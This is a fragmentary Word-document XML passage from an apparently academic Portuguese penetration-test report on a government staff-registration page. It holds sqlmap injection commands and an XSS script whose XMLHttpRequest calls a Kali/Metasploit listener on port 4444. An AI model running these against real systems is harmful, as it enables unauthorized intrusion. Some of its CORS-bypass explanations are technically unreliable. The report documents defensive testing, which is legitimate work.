      <w:r w:rsidR="00F338E7" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i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 xml:space="preserve">Dessa forma foi possível identificar que o campo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Siape”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’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softHyphen/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="0048383A" w:rsidP="00417A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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417AE8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Usar a fe</w:t>
      </w:r>
      <w:r w:rsidR="00F338E7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rramenta Sqlmap para realizar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 xml:space="preserve"> teste</w:t>
      </w:r>
      <w:r w:rsidR="00F338E7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s para injetar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SQL na página.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001600C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Para realizar essa sessão de teste, foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP da requisição no momento em que a página de Cadastro Servidor é acessada. A figura 24</w:t>
      </w:r>
      <w:r w:rsidR="00986FE1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 xml:space="preserve">mostra os dados obtidos através do Burp Suite. Esses dados foram salvos no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaCadastroServidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ser utilizado na execução do teste.</w:t>
      </w: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35A51" w:rsidRPr="00D56FE7" w:rsidRDefault="00F35A51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986FE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4779D374" wp14:editId="27B1F2F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>62865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>198120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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E4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Figura 24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– Dados da requisição </w:t>
      </w:r>
      <w:r w:rsidR="00F35A51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>à pagina Cadastro Servidor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capturada pelo Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001600C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D56FE7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sqlmap -r paramsTelaCadastroServidor -p nome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sqlmap -r paramsTelaCadastroServidor -p siape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sqlmap -r paramsTelaCadastroServidor -p cpf --dbms=msql</w:t>
      </w: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sqlmap” executa a ferramenta Sqlmap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r w:rsidR="00986FE1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaCadastroServidor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:rsidR="0001600C" w:rsidRPr="00D56FE7" w:rsidRDefault="0001600C" w:rsidP="0001600C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“--current-db” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001600C" w:rsidRPr="00D56FE7" w:rsidRDefault="0001600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ab/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Espera-se que o sistema realize o tratamento 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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os parâmetros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”, ”</w:t>
      </w:r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siape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” e “</w:t>
      </w:r>
      <w:r w:rsidR="005C42F0" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidR="005C42F0" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e não permita a injeção de SQL nesses campos</w:t>
      </w:r>
      <w:r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C42F0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latório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” não são injetáveis</w:t>
      </w:r>
      <w:r w:rsidR="005C42F0" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> à SQL</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> conform</w:t>
      </w:r>
      <w:r w:rsidR="009C5A26" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e mostram as figuras 25, 26 e 27</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417AE8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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A3050A6" wp14:editId="5A92CF3D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>320040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="526542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F75" w:rsidRPr="00D56FE7" w:rsidRDefault="009C5A2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72FA9" wp14:editId="6D1C1A78">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>300990</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1280795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3714750" cy="14287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FC344" id="Retângulo 14" o:spid="_x0000_s1026" style="position:absolute;margin-left:23.7pt;margin-top:-100.85pt;width:292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H/bw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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 25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F35A51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste de 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</w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="00417AE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45D7D" wp14:editId="4FA34838">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>186690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1320165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3714750" cy="142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C12EF" id="Retângulo 15" o:spid="_x0000_s1026" style="position:absolute;margin-left:14.7pt;margin-top:-103.95pt;width:292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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00D56FE7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94080" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="046E8703" wp14:editId="1F3E2F2C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>139065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="3986530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight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A26" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 26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F35A51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste de 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Siape.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9C5A26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A70F1" wp14:editId="3B7B92A3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>43815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2935605</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3714750" cy="142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7ACE0" id="Retângulo 16" o:spid="_x0000_s1026" style="position:absolute;margin-left:3.45pt;margin-top:231.15pt;width:292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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00E77F75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EB8431" wp14:editId="753B2975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</w:t>
      </w:r>
      <w:r w:rsidR="009C5A26" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gura 27</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test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F35A51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i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njeção </w:t>
      </w:r>
      <w:r w:rsidR="00F35A51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SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w: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C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="005C718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Iteração 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="00201E30" w:rsidP="00201E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5.1 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>Explorar XSS – Tela Cadastro Servidor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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00D56FE7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760D9A" w:rsidRPr="00D56FE7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Com base no relatório de execução obtido no teste da seç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4.3.4.1, sabe-se que os navegadores Iceweasel e Firefox, através do filtro CORS, bloqueiam requisições que usam Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00760D9A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Dessa forma, será utilizado o camp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“</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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”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, da tela Cadastro Servidor,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para tentar incluir um script malicioso que consiga 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ignorar o filtro CORS e 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realiz</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e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uma chamada a um listener do Mestasploit para executar um ataque usando Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760D9A" w:rsidRDefault="00760D9A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B2A0B" w:rsidRDefault="001B2A0B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4325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lastRenderedPageBreak/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:rsidR="008C6DC7" w:rsidRPr="00D56FE7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</w:t>
      </w:r>
      <w:r w:rsidR="00760D9A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ignorar</w:t>
      </w:r>
      <w:r w:rsidR="00BE0837" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o filtro CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do navegador é necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma </w:t>
      </w:r>
      <w:r w:rsidR="00BE0837" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>withCredencials”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7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E52417" w:rsidRPr="00D56FE7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ódigo abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  do</w:t>
      </w:r>
      <w:r w:rsidR="00EC0987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tipo GET para IP_do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>_</w:t>
      </w:r>
      <w:r w:rsidR="00546C53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali_linux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6FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>na porta 4444 de forma assíncrona. Porém, aqui é utilizado o atributo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">withCredencials” </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para burlar o filtro de CORS do navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRPr="00D56FE7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script&gt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XMLHttpRequest(); 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("GET",’</w:t>
      </w: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http://IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00546C53"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_kali_linux</w:t>
      </w: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4444’,false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)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1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials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 = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00432597" w:rsidRDefault="008C6DC7" w:rsidP="00A8056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nd();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRDefault="008C6DC7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  <w:r w:rsidRPr="00432597">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r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/</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00432597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script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80565" w:rsidRPr="00432597" w:rsidRDefault="00A80565" w:rsidP="00A80565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</w:pPr>
    </w:p>
    <w:p w:rsidR="00EC0987" w:rsidRPr="00D56FE7" w:rsidRDefault="000F06E4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EC0987" w:rsidRPr="00D56FE7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</w:pPr>
      <w:r w:rsidRPr="00D56FE7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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC0987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O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC0987" w:rsidRPr="00D56FE7" w:rsidRDefault="00EC0987" w:rsidP="00EC098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Não foi possível realizar o teste com êxito. Pois conforme mostra a figura 28, o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foi depreciado pelo navegador e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00D56FE7" w:rsidRDefault="00A805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 wp14:anchorId="0D6E42FA" wp14:editId="5A0C17DB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>200660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="649605"/>
            <wp:effectExtent l="0" t="0" r="0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EC0987" w:rsidP="00A80565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8</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“withCredencials”</w:t>
      </w:r>
      <w:r w:rsidR="00166FEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00D56FE7" w:rsidRDefault="00751591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D56FE7" w:rsidRDefault="0048383A" w:rsidP="00A80565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D56FE7"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8C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008719F1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 xml:space="preserve">Para </w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ignorar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o filtro CORS, deve ser adicionado ao cabeçalho da requisição uma instrução que simule uma assi</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">natura válida para o navegador. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Para esse fim, foi utilizad</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a instrução “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">setRequestHeader” </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
